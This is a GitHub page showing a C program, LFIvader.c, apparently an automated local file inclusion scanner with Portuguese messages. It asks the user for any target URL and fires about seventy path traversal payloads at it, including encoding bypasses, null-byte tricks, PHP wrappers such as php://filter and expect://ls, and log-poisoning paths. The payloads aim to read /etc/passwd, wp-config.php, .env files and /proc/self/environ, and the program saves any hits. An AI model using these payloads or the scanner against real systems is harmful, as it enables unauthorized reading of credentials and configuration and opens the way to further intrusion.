-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathLFIvader.c
249 lines (197 loc) · 10.5 KB
/
LFIvader.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <unistd.h>
void limpa(){
system("clear");
}
void imprime_banner() {
const char *banner[] = {
"⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠋⠉⠁⠄⠄⠈⠙⠻⣿⣿⣿⣿",
"⣿⣿⣿⣿⣿⣿⠟⠁⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠙⢿⣿",
"⣿⣿⣿⣿⡿⠃⠄⠄⠄⢀⣀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠈⢿",
"⣿⣿⣿⡟⠄⠄⠄⠄⠐⢻⣿⣿⣿⣷⡄⠄⠄⠄⠄⠄⠄⠈",
"⣿⣿⣿⠃⠄⠄⠄⢀⠴⠛⠙⣿⣿⡿⣿⣦⠄⠄⠄⠄⠄⠄",
"⣿⣿⠃⠄⢠⡖⠉⠄⠄⠄⣠⣿⡏⠄⢹⣿⠄⠄⠄⠄⠄⢠",
"⣿⠃⠄⠄⢸⣧⣤⣤⣤⢾⣿⣿⡇⠄⠈⢻⡆⠄⠄⠄⠄⣾",
"⠁⠄⠄⠄⠈⠉⠛⢿⡟⠉⠉⣿⣷⣀⠄⠄⣿⡆⠄⠄⢠⣿",
"⠄⠄⠄⠄⠄⠄⢠⡿⠿⢿⣷⣿⣿⣿⣿⣿⠿⠃⠄⠄⣸⣿",
"⠄⠄⠄⠄⠄⢀⡞⠄⠄⠄⠈⣿⣿⣿⡟⠁⠄⠄⠄⠄⣿⣿",
"⠄⠄⠄⠄⠄⢸⠄⠄⠄⠄⢀⣿⣿⡟⠄⠄⠄⠄⠄⢠⣿⣿",
"⠄⠄⠄⠄⠄⠘⠄⠄⠄⢀⡼⠛⠉⠄⠄⠄⠄⠄⠄⣼⣿⣿",
"⠄⠄⠄⠄⠄⡇⠄⠄⢀⠎⠄⠄⠄⠄Creatd by Wesley Alexsander",
"⠄⠄⠄⠄⢰⠃⠄⢀⠎⠄⠄⠄https://github.com/WesleyA0101"
};
for (int i = 0; i < sizeof(banner) / sizeof(banner[0]); i++) {
printf("%s\n", banner[i]);
}
}
void animacao_carregando(const char *msg){
const char animacao[] = "|/-\\";
int i = 0;
printf("%s", msg);
fflush(stdout);
for(int j = 0; j < 20; j++){
printf("\r%s %c", msg, animacao[i %4]);
fflush(stdout);
usleep(100000);
i++;
}
printf("\r%s Concluído! \n", msg);
}
size_t write_callback(void *contents, size_t size, size_t nmemb, void *userp){
size_t realsize = size * nmemb;
if(realsize + strlen(userp) < 4096){
strncat(userp, contents, realsize);
}
return realsize;
}
void salvar_em_arquivos(const char *dados){
FILE *arquivo = fopen("resultados_lfi.txt", "a");
if(arquivo != NULL){
fprintf(arquivo, "%s\n", dados);
fclose(arquivo);
printf("\033[0;32;1mResultados salvos em 'resultados_lfi.txt'. \033[0m\n");
}else{
printf("\033[0;31;1mErro ao salvar os resultados...\033[0m\n");
}
}
void exibir_resultados_formatados(const char *dados, const char *url_teste){
printf("\033[0;32;1mVulnerabilidade LFI encontrada: %s\n", url_teste);
printf("-----------------------------------------------------------");
printf("%s\n", dados);
printf("----------------------------------------------------------");
salvar_em_arquivos(dados);
}
int verificar_resposta_valida(const char *response){
return strstr(response, "root:x:") || strstr(response, "[boot loader]") || strstr(response, "server_name");
}
void testar_lfi(const char *url){
CURL *curl;
CURLcode res;
char response[4096] = {0};
const char *listlfi[] = {
// Basic Local File Inclusions
"/?page=../../../../etc/passwd", // Unix/Linux passwd file
"/?file=../../../../etc/passwd", // Alternative file inclusion
"/?view=../../../../etc/passwd", // Alternative parameter
"/?document=../../../../etc/passwd", // Alternative parameter name
"/?include=../../../../etc/passwd", // Alternative parameter name
"/?content=../../../../etc/passwd", // Reading sensitive file
"/?path=../../../../etc/passwd", // Common path parameter
"/index.php?page=../../../../etc/passwd", // Classic PHP LFI
"/?module=../../../../etc/passwd", // Module-specific inclusion
"/?load=../../../../etc/passwd", // Alternative for loading files
// Encoded Traversals
"/?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd", // URL-encoded slashes
"/?page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd", // Double URL-encoded
"/?page=..%252F..%252F..%252F..%252Fetc%252Fpasswd", // Double-encoded slashes
// Null Byte Injection
"/?page=../../../../etc/passwd%00", // Null byte injection
"/?file=../../../../etc/passwd%00", // Null byte with file param
// Windows Files
"/?page=../../../../boot.ini", // Windows Boot configuration
"/?file=../../../../windows/win.ini", // Windows INI file
"/?path=../../../../windows/system32/drivers/etc/hosts", // Windows hosts file
// Log Files
"/?page=../../../../var/log/apache2/access.log", // Unix log poisoning
"/?file=../../../../var/log/apache2/error.log", // Unix error logs
"/?page=../../../../var/log/nginx/access.log", // Nginx logs
"/?file=../../../../var/log/nginx/error.log", // Nginx error logs
// PHP Wrappers
"/?page=php://filter/convert.base64-encode/resource=index", // Base64 encoding
"/?page=php://input", // Include POST input
"/?page=php://fd/0", // File descriptor
// NTFS ADS
"/?page=../../../../boot.ini::$DATA", // ADS access on NTFS
// System Information
"/?page=/proc/self/environ", // Access environment variables
"/?file=/proc/self/cmdline", // Command line arguments
"/?path=/proc/version", // Kernel version
// CMS Configuration Files
"/?page=../../../../wp-config.php", // WordPress config file
"/?file=../../../../configuration.php", // Joomla config file
"/?path=../../../../config.php", // General config file
"/?include=../../../../app/etc/local.xml", // Magento config file
"/?module=../../../../.env", // Laravel environment file
// Directory Traversals
"/?page=../index.php", // Single level up
"/?page=../../index.php", // Two levels up
"/?page=../../../index.php", // Three levels up
"/?page=../../../../index.php", // Four levels up
// Advanced LFI and Bypasses
"/?file=....//....//....//etc/passwd", // Double slashes
"/?file=....\\\\....\\\\....\\\\etc\\\\passwd", // Double backslashes
"/?file=..%2f..%2f..%2f..%2fetc%2fpasswd", // Mixed encoding
"/?file=..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts", // Windows encoding
"/?file=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd", // UTF-8 encoded traversal
"/?file=..%c0%ae%c0%ae%c0%ae%c0%ae/etc/passwd", // UTF-8 encoded dots
"/?file=../../../../etc/passwd%2500", // Null byte with encoding
"/?file=../../../../etc/passwd%00.php", // PHP extension spoofing
// More PHP Wrappers
"/?file=php://filter/read=convert.base64-encode/resource=../../../../etc/passwd", // Base64 encode bypass
"/?file=php://filter/convert.base64-encode/resource=index.php", // Encode PHP file
"/?file=php://input", // Read POST input
"/?file=php://fd/0", // STDIN as file descriptor
"/?file=php://temp", // PHP temp file stream
"/?file=php://memory", // PHP memory stream
"/?file=expect://ls", // Execute commands (if allowed)
"/?file=zip://../../../../var/log/access.log%23file", // Zip wrapper to read files
"/?file=phar://../../../../test.phar", // Phar wrapper
// Log Poisoning
"/?file=/var/log/apache2/access.log", // Poison Apache logs
"/?file=/var/log/nginx/access.log", // Poison Nginx logs
"/?file=/var/log/httpd/error.log", // Poison HTTPD logs
// Container and Virtual Environments
"/?file=/proc/self/mounts", // Active mounts in the system
"/?file=/proc/self/cgroup", // Cgroup details (Docker, Kubernetes)
"/?file=/proc/self/fd/0", // Open file descriptor 0
"/?file=/proc/self/fd/1", // Open file descriptor 1
"/?file=/proc/self/exe", // Current executable file
// CMS-specific Configs
"/?file=../../../../wp-content/debug.log", // WordPress debug logs
"/?file=../../../../wp-config.php~", // WordPress backup file
"/?file=../../../../storage/logs/laravel.log", // Laravel logs
"/?file=../../../../configuration.php-dist", // Joomla sample config
};
int total_listlfi = sizeof(listlfi) / sizeof(listlfi[0]);
curl_global_init(CURL_GLOBAL_DEFAULT);
curl = curl_easy_init();
if(curl){
for(int i = 0; i < total_listlfi; i++){
char full_url[512];
snprintf(full_url, sizeof(full_url), "%s%s", url, listlfi[i]);
animacao_carregando("Testando LFI");
curl_easy_setopt(curl, CURLOPT_URL, full_url);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, response);
curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
memset(response, 0, sizeof(response));
printf("Testando: %s\n", full_url);
res = curl_easy_perform(curl);
if(res == CURLE_OK && verificar_resposta_valida(response)){
exibir_resultados_formatados(response, full_url);
}else{
printf("\033[0;31;1m[Sem vulnerabilidade válida]: %s\n", full_url);
}
}
curl_easy_cleanup(curl);
}else{
printf("Erro ao inicializar cURL.\n");
}
curl_global_cleanup();
}
int main(){
limpa();
imprime_banner();
char url[256];
printf("\nDigite a URL do alvo (ex: https://www.alvo.com): ");
scanf("%s", url);
animacao_carregando("Cerregando...");
printf("\033[0;33;1mIniciando testes de LFI no alvo: %s\n", url);
printf("\033[0;36;1mEste processo pode demorar dependendo da resposta do servidor.\n");
testar_lfi(url);
printf("\033[0;32;1mTeste concluído. Resultados podem ser encontrados em 'resultados_lfi.txt'.\n");
return 0;
}